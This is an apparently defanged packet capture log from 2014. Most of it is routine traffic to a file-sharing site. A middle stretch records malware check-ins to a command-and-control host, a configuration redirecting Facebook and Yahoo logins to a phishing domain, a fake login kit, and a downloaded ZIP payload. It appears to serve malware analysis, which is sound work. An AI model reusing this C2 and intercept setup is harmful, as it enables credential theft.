ml>":"") "<html><body>"),cl.close();d=cl.createElement(
a),cl.body.appendChild(d),e=f.css(d,"display"),b.removeChild(ck)}cj[a]
=e}return cj[a]}function ct(a,b){var c={};f.each(cp.concat.apply([],cp
.slice(0,b)),function(){c[this]=a});return c}function cs(){cq=b}functi
on cr(){setTimeout(cs,0);return cq=f.now()}function ci(){try{return ne
w a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ch(){try{re
turn new a.XMLHttpRequest}catch(b){}}function cb(a,c){a.dataFilter&&(c
=a.dataFilter(c,a.dataType));var d=a.dataTypes,e={},g,h,i=d.length,j,k
=d[0],l,m,n,o,p;for(g=1;g<i;g  ){if(g===1)for(h in a.converters)typ
eof h=="string"&&(e[h.toLowerCase()]=a.converters[h]);l=k,k=d[g];if(k=
=="*")k=l;else if(l!=="*"&&l!==k){m=l " " k,n=e[m]||e["* " k];if(!n){p
=b;for(o in e){j=o.split(" ");if(j[0]===l||j[0]==="*"){p=e[j[1] " " k]
;if(p){o=e[o],o===!0?n=p:p===!0&&(n=o);break}}}}!n&&!p&&f.error("No co
nversion from " m.replace(" "," to ")),n!==!0&&(c=n?n(c):p(o(c)))}}ret
urn c}function ca(a,c,d){var e=a.contents,f=a.dataTypes,g=a.respon
<<< skipped >>>

GET /_images/ico_24_upload.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 1618

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-652"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
.PNG........IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e&
lt;...SiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c060 61.134342, 2010/01/10-18:06:43        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="uu
id:257E611FF3B9E111ADFFA94C7A3A3204" xmpMM:DocumentID="xmp.did:DDE02BC
3E30C11E1A82DD38E61C78D4D" xmpMM:InstanceID="xmp.iid:DDE02BC2E30C11E1A
82DD38E61C78D4D" xmp:CreatorTool="Adobe Photoshop CS5"> <xmpMM:D
erivedFrom stRef:instanceID="uuid:54EEA7D7DECDE111A8DDAB7BBB8AB66E" st
Ref:documentID="uuid:257E611FF3B9E111ADFFA94C7A3A3204"/> </rdf:D
escription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r
"?>..Yz....IDATx..VO..a..3..Y.Qw..O....6.0h!.:G.t..V...m/A.=.....K.
].x.K......b.[s.E.MqL....\...m5<..7.|.|.{.....o.UUa....e....`...."D
...|#"..D.B(...Q.3p.Z......T...w..N....tC...F.....n....P(.=...a.@z....
......9.X..........L^h.j.....D.b3.. .*..j.(.....P(..hl.;._.l.'...y.v..
.h@E.`...A..m.DQ.(.J...*l..p..ci...>..R...6EZ )........1.s.aV.n..X.
. .T*.Hl|.h.%..v(.7p.L[8.~...c.G6@"[email protected].;...ak..9......^.....2.E.
;e.....>b..D...';.l..`.......)...&..$g .).*S......j.......(...#..U.
..k....$I...a...S..j...N].....F.....y..l.N...:G..0....IQ..D..ln..3
<<< skipped >>>

GET /_images/header_bg.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 151

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-97"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
.PNG........IHDR.......\..... gH.....tEXtSoftware.Adobe ImageReadyq.e&
lt;...9IDATx.b...?.....#.........&G..s.e#cd1llB........L3s........cp..
......IEND.B`.....


GET /_images/login_highlight.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 124

Last-Modified: Mon, 10 Sep 2012 19:25:00 GMT

Connection: keep-alive

ETag: "504e3e8c-7c"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
.PNG........IHDR.............L.W.....tEXtSoftware.Adobe ImageReadyq.e&
lt;....IDATx.b....^&. ..o..b..b..................IEND.B`.....


GET /_images/home/home_upload_01.jpg HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/jpeg

Content-Length: 53109

Last-Modified: Thu, 13 Sep 2012 20:34:28 GMT

Connection: keep-alive

ETag: "50524354-cf75"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
......Exif..II*.................Ducky.......P.....&Adobe.d............
...3...P~...D...s.....................................................
......................................................................
.................%....................................................
........................................... 0!.2.P`1"..35#4%[email protected]......
.................!1...Q2..5 0Aaq."34.`.....BRr...#[email protected]...
.Td....................1.!.0`. @A.2P.Qaq."...Bpr#....................!
1Aq..Qa 0........P@`p..........................1.0..(..............V..
`...id...%..V.&%@[email protected].................  .J...A......B. a. .A .$
...%sK$.. f.\F..Pd\..cLV..e .....x.V...-......%a............H.......P.
[email protected]. ..g..F.X....*5......J5....K.Q..X.1.d! X..^Y...... ....
..P............T.....e.J...^Q%,..ifUa..2K.Y5.....IF.X.61..Ml..>9\..
[email protected][email protected].!D...~..{|&._9.
..>0....\..L..o...f....r...`.....a...P [email protected].."...L.
H.............(..X.2.....{>......3..}.>..?.....X....X4..Z].s&.X.
...Ye.S,".\ni..f...e.(.b.,.L...A.....2J......P....(...V@.%@...$.../.Yd
..l./f......4......u..>$./...*Y..z..'W=.<....<.w.......U4..v.
~.W..k...>7..P..X..;[email protected].....$.0..$
.I.[(.b.....w.N.....y.w1...:7}1.......Y..%.8.=.....V.....;...<w....
....}%..G.^...i.....o....Z\vj...%.(..X..^[..U*...... .....L.,...H..A..
...&P".v.2K.Y*a..l.......%.y>..z..1}...e..2.4n.g.._c./O....H.......
.....F....._.}?7.|._[<z._&.9p{....m\.....<.Q0e `..$.A.l.E..%
<<< skipped >>>

GET /_images/home/home_signup_button.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 4264

Last-Modified: Mon, 10 Sep 2012 22:54:03 GMT

Connection: keep-alive

ETag: "504e6f8b-10a8"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
.PNG........IHDR....... ........?....tEXtSoftware.Adobe ImageReadyq.e&
lt;...JIDATx..].tT......d..d2y.I&...$.W.AQ..U.z..]..]...........]W.Vm.
....l-.l..Q.......H..G.H L..I.=w.sr..3s&.n.....vf.~..........T[".P....
...u$U.....W.....9..}.>h..'.;.. ..n..ld;R.R..6)...n.T.<.ZuhmM...
.....l...<.3..ME..>.....X....$..FX........un..EX7.|.ZO...(......
.....9.?...*Gy...a.Z(P......V............0..}.w.T9..)..@A4.^0..R......
.. [email protected](.C..i..P,...1..h..0q..f(P r..^\....U.i....z..j(....k.M..eC
F.6..h.....a>c.y......n.:...D..LM.......A........a.~.W....?.i.m..^.
.........r..&:1.V.....3pm.9ay.-........|x~ a..........{<d....`X{...
....`..g...2#.#.....'.O:w...An...[u.Q.X...E...t."/.*R".P._..K...y.....
..*.......o...em{\~0........I...M_.[%.D.w....g.p../#baw(...s.v...U...;
.2G2j....X.(.}....fO>....A..4...zr.EQ.0cI.0v..X....f2...M....[%.N&l
t;5C.....'([email protected]../....q#........|...........w.L.._.5.2.U.S.>.
....w{q._o.I...|..7..(.$1yu...c%4.... "..WA....C=.....Z.....N.........
=H....f.k..'....H....\,.LA......T...'....5I.n...-.sv..">.{..UnC.[u.
.9.Z4.;[email protected];...5..F........NtI...u....
...*...Z.e.ol!TE..?...Vo........X:.......Fp.=.._...O9b..q.8n.*E.....G.
[email protected]..%.|...al..q..#...Ez.I...#....;.....:.u.
.xy.b.......jj9B#.W..........<8;..........23....St.h....|....L.P...
....b\..>....}....3.X.........e..#.4...B.zlW....I............U....q
......r.5.....(".<. [email protected]....)..{'.|YC..'....Uf.^[email protected]
..............*q...K...I..c}M....Ax....?l.m.#(.....A-.zm..-..Q....
<<< skipped >>>

GET /forum/search.php?method=checkport&port=48744&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 502 Cannot find server.

Date: Fri, 30 May 2014 15:55:57 GMT

Server: YTS/1.20.28

Cache-Control: no-store

Content-Type: text/html

Content-Language: en

Content-Length: 2477
<HEAD><TITLE>Cannot find server.</TITLE></HEAD>
;.<BODY BGCOLOR="white" FGCOLOR="black">.<FONT FACE="Helvetic
a,Arial"><B>. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 
Final//EN"><html><head><style>a:link {font:8pt/11
pt verdana; color:red}a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style><meta HTTP-EQUIV="Content-Type" Content="text-html; c
harset=Windows-1252"><title>Cannot find server</title>&
lt;/head><body bgcolor="white"><table width="400" cellpadd
ing="3" cellspacing="5"><tr><td id="tableProps2" align="le
ft" valign="middle" width="360"><h1 id="textSection1"style="COLO
R: black; FONT: 13pt/15pt verdana"><span id="errorText">The p
age cannot be displayed</span></h1></td></tr>&
lt;tr><td id="tablePropsWidth" width="400" colspan="2"><fo
nt style="COLOR: black; FONT: 8pt/11pt verdana">The page you are lo
oking for is currently unavailable. The Web site might be experiencing
 technical difficulties, or you may need to adjust your browser settin
gs.</font></td></tr><tr><td id="tablePropsW
idth" width="400" colspan="2"><font id="LID1"style="COLOR: black
; FONT: 8pt/11pt verdana"><hr color="#C0C0C0" noshade><p i
d="LID2">Please try the following:</p><ul><li id="in
structionsText1">Click the Refresh button, or try again later.</
li><li id="instructionsText2"> If you typed the page addr
<<< skipped >>>

GET /ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://VVV.fileswap.com/&random=2372120351 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: NID=67=t8o-Zui-3gnP-ve0tH7WYex-hn4pMhm1EpKCxI3m5PBHcFBoMJo8aCL-teIkHsnvONZxZ0L-zJqhyD35HUtVVcDze46xFBGVMiMbFC0VCvHVInY6KocRSe79gKG2PLsO

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.google.com

HTTP/1.1 302 Found

Location: hXXp://VVV.google.ca/ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://VVV.fileswap.com/&random=2372120351&ipr=y

Cache-Control: private, max-age=43200

Date: Fri, 30 May 2014 15:56:12 GMT

Expires: Fri, 30 May 2014 15:56:12 GMT

Content-Type: text/html; charset=UTF-8

X-Content-Type-Options: nosniff

Server: adclick_server

Content-Length: 424

X-XSS-Protection: 1; mode=block

Alternate-Protocol: 80:quic
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXp://VVV.google.ca/ads/user-lists/1072568869/?label=n
JZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_pre
sent=false&cv=7&frm=0&url=http://VVV.fileswap.com/
&random=2372120351&ipr=y">here</A>...</BODY><
;/HTML>....

GET /forum/search.php?method=all&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:56:09 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
ping.5.FLAG cfg.215."westweight.net" "watchstand.net" "spendstudy.net"
 "southblood.net" "deadtomorrow.net" "signarmy.net" "saltsecond.net" "
wifeknew.net" "ringfirst.net" "rockknew.net" "hangclock.net" "pointdea
l.net" "lasopeidres.com" var_user_ip.560.%invite_cc% = "1";.ºn_conta
ct% = "1";.%live_link% = "hXXp://helpdesk.corp.ebay.com/chat.php?id=40
94&sess=2eb56a4ecf4b19a9afea607c2a27c8ec&talk=1";.ëaylive% = "middle
every.net";.%set_intercepts% = ""VVV.facebook.com" "middleevery.net" "
/fb_login/" "/login/" "1" "facebook.com" "middleevery.net" "/fb_login/
" "/login/" "0" "mail.yahoo.com" "middleevery.net" "/yahoo/" "/config/
" "0" ";.Þp_host% = "middleevery.net";.Þp_path% = "/dep/";.%no_pas
sword% = "0";.%timer% = "1200";.%state% = "BU";.%cpuinfo% = "Intel(R) 
Xeon(R) CPU E7340 @ 2.40GHz (2393 MHz)";..............

GET /fb_login/index_files/YpD-WuoLxM8.js?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Tue, 02 Apr 2013 04:17:16 GMT

Accept-Ranges: bytes

Content-Length: 61686

Content-Type: application/x-javascript

Age: 0

Connection: close

Server: YTS/1.20.28
/*1364677351,173213727*/..if (self.CavalryLogger) { CavalryLogger.star
t_js(["6Ozhu"]); }.....self.__DEV__=self.__DEV__||0;....if(JSON.string
ify(["\u2028\u2029"])==='["\u2028\u2029"]')JSON.stringify=function(a){
var b=/\u2028/g,c=/\u2029/g;return function(d,e,f){var g=a.call(this,d
,e,f);if(g){if(-1<g.indexOf('\u2028'))g=g.replace(b,'\\u2028');if(-
1<g.indexOf('\u2029'))g=g.replace(c,'\\u2029');}return g;};}(JSON.s
tringify);........(function(a){if(a.require)return;var b=Object.protot
ype.toString,c={},d={},e={},f=0,g=1,h=2,i=Object.prototype.hasOwnPrope
rty;function j(s){if(a.ErrorUtils&&!a.ErrorUtils.inGuard())return Erro
rUtils.applyWithGuard(j,this,arguments);var t=c[s],u,v,w;if(!c[s]){w='
Requiring unknown module "' s '"';throw new Error(w);}if(t.hasError)th
row new Error('Requiring module "' s '" which threw an exception');if(
t.waiting){w='Requiring module "' s '" with unresolved dependencies';t
hrow new Error(w);}if(!t.exports){var x=t.exports={},y=t.factory;if(ty
peof y==='string'){var z='(' y ')';y=eval.apply(a,[z]);}if(b.call(y)==
='[object Function]'){var aa=[],ba=t.dependencies,ca=ba.length,da;if(t
.special&h)ca=Math.min(ca,y.length);try{for(v=0;v<ca;v  ){u=ba[v];a
a.push(u==='module'?t:(u==='exports'?x:j(u)));}da=y.apply(t.context||a
,aa);}catch(ea){t.hasError=true;throw ea;}if(da)t.exports=da;}else t.e
xports=y;}if(t.refcount--===1)delete c[s];return t.exports;}function k
(s,t,u,v,w,x){if(t===undefined){t=[];u=s;s=n();}else if(u===undefined)
{u=t;if(b.call(s)==='[object Array]'){t=s;s=n();}else t=[];}var y=
<<< skipped >>>

GET /fb_login/index_files/276449379149296_646761364.png?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://middleevery.net/fb_login/

Accept: */*

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Cache-Control: max-age=864000

Expires: Mon, 09 Jun 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 981

Content-Type: image/png

Age: 0

Connection: close

Server: YTS/1.20.28
.PNG........IHDR...7...1.....~.1[....IDATh.c...?.9 ,l5.w......;302..c.
M............Y........NN%....LL...5............?....9.]i.g.>....(5.
...?7;.'f.&.&r.....&W/=..31}&.s...p".v.b.|..o/.t.z.nAMe..u.......JL..T
......H.A....q,....Y...X...2...D.4t<'".....~..O.9%L..,O....t0. 3.o"
..9e.......K.P....h.....M..0R.r.h...L.P.h...H!.Id.........b..\..tT....
.i:....d...q6...%..Y~....?...z......>~...Xo.(..r.............._.=..
[email protected].#.U.....).N.}...7b...j.J.....JQg...1.ys..A4x.....
/\..f..e)..c*........Nn"..v&.w.=t. .Cr.q......a.o...."./.a....So......
s...#47..h...O.......p.....7'p...3...\|h....${.d9h>.... .C(..p.c..$
..dW....4.`......"V.P...?${.ID.\|...4U'$.E.J!..L....L.L4.......LQ..w..
AF..y..>.~........A6|.....>...Y...j..., $..N.....MR.W...-..o=.zQ
.A\...`}r......#....=. ...|.5u]...3.. ............za1......U.... ..~..
3.E........w`M....je.d.!&..g.=?....9tq.|...Yu =.s#.........=7.<.. .
.L.TL.R.!...M.....@.$.sC.cDyn.z..9...........AR*[email protected]
......F^E%....IEND.B`...

GET /dep/purple.zip HTTP/1.0

Accept: */*

Connection: close

Host: middleevery.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:47 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Tue, 20 May 2014 22:57:46 GMT

Accept-Ranges: bytes

Content-Length: 3668848

Content-Type: application/zip

Age: 2

Server: YTS/1.20.28
PK........Sw.D................sasl2/PK........W"CD.@..~...........sasl
2/saslANONYMOUS.dll...|T..8..f7..6..... JT4...MX...&A.n..%B.V..R..^...
.......V[}....C.}j. V..`..* U...6..K5JL6.r...{.f.......y}....{...3g...
93s.L..;,6..b.?M.X.Y..y.......i..myi....g]....U..1}C.w......w.u.......
6.J.?......Q.....Y{]R......? ....[_4.......z...].|..k)..........b.<
..?...z>..w.....%=..{w%.3i.z,...x..[.zMX.%..Q.....V.e...5.~...j.7|.
.X.-..}Z:.:.(8.J..z...?..Y-......2..MVK.v.f..Z.D...b.%...|C.ux...[....
:i.....A'..j..'.bY}].....,..n4.>..7.G...].G.<:[email protected]].....
...d..........D.....h..(.|..... .....`.|.<..7.....z..%..K....X;..t.
..4......Z.G.....GP..........!..WG..l..?.wekF.E.........mT.:..I9!...bU
K)[..Vw...eS...`...79Td....[9h.....m..#[email protected].?XQ..J|.e...j.N
.ag....W...d_..Q....H.v.,V...2...1.c... }...dI.......-..."U.HV ...t."C
...V,[email protected][.. ....:q..U1......^....Gy_.c...}].y.w.w.l.p....p....
l.....gP....y.!.G.....U.*._...B;Y>[email protected]|sV........Z
hW. ..F.u.S.....6.A.>#..E}F.>.g..GI){.^|........2...:...H..(M.5M
.....p.....@..[.z.>....A.......MU'.<....R:...jg?%.#@v.....s]..(.
r..n.|X..C..}.....1.p...{xK*. [email protected]......!.ai. ...q..`....#..
T..Zn.h........*.Av...Oi1..HD..e...\..|..[......=;U....!...y..B....~v.
J_.../`c....m..........#X6..B.2f.,..R1/..Z.1...H.V'.f4<.1..C.....B.
gX.[.{C......8J..q..qb.?.P.w.RK.g.....q...i.{.#....y.]....5...{../..YK
C....|Y2 *.B.P.@......\M....g....a..-.P...y..8.b.;[email protected]... 
P...... ..S..h..._./._..........$......a....../.c...v.o.....>..
<<< skipped >>>

GET /fb_login/index_files/276449379149296_1538611903.png?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://middleevery.net/fb_login/

Accept: */*

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Cache-Control: max-age=864000

Expires: Mon, 09 Jun 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 1490

Content-Type: image/png

Age: 0

Connection: close

Server: YTS/1.20.28
.PNG........IHDR...,...-.............IDATX...kLTG...k...\X.)Oy...P..P,
.....}.....P......6.....I.c.MZ...h..`.VZ.....Q.-.....C...Zv.n.Ywnn..w.
.2...9s....s..0..f..[..[.\.E.r(....T..P6.{...;s.~..j.8.a... .........K
..j......8i.....9.......Zj.d.. D...`NM..0:.&x...h...Y9........u.....w.
8..0  .bti0XJBx...H5.........R..I%...S#.t.{W...P..l2.)j..x.O...s..8JUK
G*.H.\u`..<....%..R...Q.X>.,V1.t.V.*0...nf.rok..dRW#W..U6|.^d-{h
..r...g.0.n.6....Y.PES..~l.5......;.&>.r...9u.....5............1.-.
.-...E....,.[.PY.........TW......4....ud..Ni...%.....>1.%..D..0;.e.
.I..... w.{;.8=....f..........P.\rb......m.6....i0).Q..a..0.`.=.......
......ov}......OYqzFq.....{.L..1...e..A.. . ;~Z.....eb`^.d%....|.....c
.....~>[email protected].,4..........).rk.7pq........ ......e(
X&........<......I.%E.>.s..*J7..?.1.(@......Mm........_5.;......
[email protected].......;...f..../`..D..K\...a{.....7.
.....9..A*.bB......M......jb........{.....Y .<..).e..).l.y.........
...kY .x.G..U/6^....^./..'...h4I.~E...E.......^...\......;.v......J..L
...\...{A_..BFd.......M.{.......M>=..b!.q..g&$o.K....[.....x...D...
......vw...;R.......g.>&.)(...n.6.!......;..;...;.....B..\..`....t.
6,.Us...}.......)UK~}..S8.J,...........&..nb...u.F.a.w%.$..P.Z......ph
x.N.aJ......h...D~7.&..../).b.6...WGw\E... ... ...e..4.,49.J......i..~
I.VQk.....v`i.HK......*4X.........L.L.R..{.....r.c". ...b~f\.;.Om.|.&g
t;.. .Ug.).../.....$.A....'.........3a.6.=q.....).a.g.z..w\a.A........
..I0.|...!..K...PQ.!.i..CNA.:....].2S.|.<....IEND.B`...
<<< skipped >>>

GET /ext/swfupload/handlers.js?v=ebg HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://VVV.fileswap.com/

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:11 GMT

Content-Type: application/javascript; charset=utf-8

Content-Length: 14901

Last-Modified: Thu, 29 Nov 2012 17:57:20 GMT

Connection: keep-alive

ETag: "50b7a200-3a35"

Expires: Sat, 31 May 2014 15:56:11 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
function labelBytes(bytes){..if (bytes > 1024 * 1024 * 1024){...ret
urn (bytes/1024/1024/1024).toFixed(1)   " GB";..}..if (bytes > 1024
 * 1024){...return (bytes/1024/1024).toFixed(1)   " MB";..}..if (bytes
 > 1024){...return (bytes/1024).toFixed(1)   " KB";..}..return byte
s   " B";.}.function flashReady().{.}.function fileDialogStart().{../*
 I don't need to do anything here */.}.function fileQueued(file).{..if
(document.getElementById('uploadTOS') != undefined && document.getElem
entById('uploadTOS').checked != true)..{...var progress = new FileProg
ress(file, this.customSettings.progressTarget);...this.cancelUpload(fi
le.id);...progress.setStatus("Cancelled - Please agree to terms of ser
vice!");...return;..}..try..{...// You might include code here that pr
events the form from being submitted while the upload is in...// progr
ess. Then you'll want to put code in the Queue Complete handler to "un
block" the form...var progress = new FileProgress(file, this.customSet
tings.progressTarget);...progress.setStatus("Pending...");...progress.
toggleCancel(file, true, this);..}..catch (ex)..{...this.debug(ex);..}
.}.function fileQueueError(file, errorCode, message).{..//uploadDialog
Hide();..try..{...if (errorCode === SWFUpload.QUEUE_ERROR.QUEUE_LIMIT_
EXCEEDED)...{....alert("You have attempted to queue too many files.\n"
   (message === 0 ? "You have reached the upload limit." : "You may se
lect "   (message > 1 ? "up to "   message   " files." : "one file.
")));....return;...}...var progress = new FileProgress(file, this.
<<< skipped >>>

GET /_images/icon/ico_footer_twitter.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 1039

Last-Modified: Mon, 10 Sep 2012 22:15:10 GMT

Connection: keep-alive

ETag: "504e666e-40f"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
.PNG........IHDR...0...0......`n.....tEXtSoftware.Adobe ImageReadyq.e&
lt;....IDATx...Kh.A....}..d...bQ. .Z.....j."V j.*....A...7/".x..(..E..
.">[email protected].
%.._...b4).:.. .(.x..O.(@$.....X...k<...3...e.~.Af.A......N.....7.,
.2.:.3eS..e......r......w...a.u].TW.bg...T.2.b...O7.U....~B).y..1`..v.
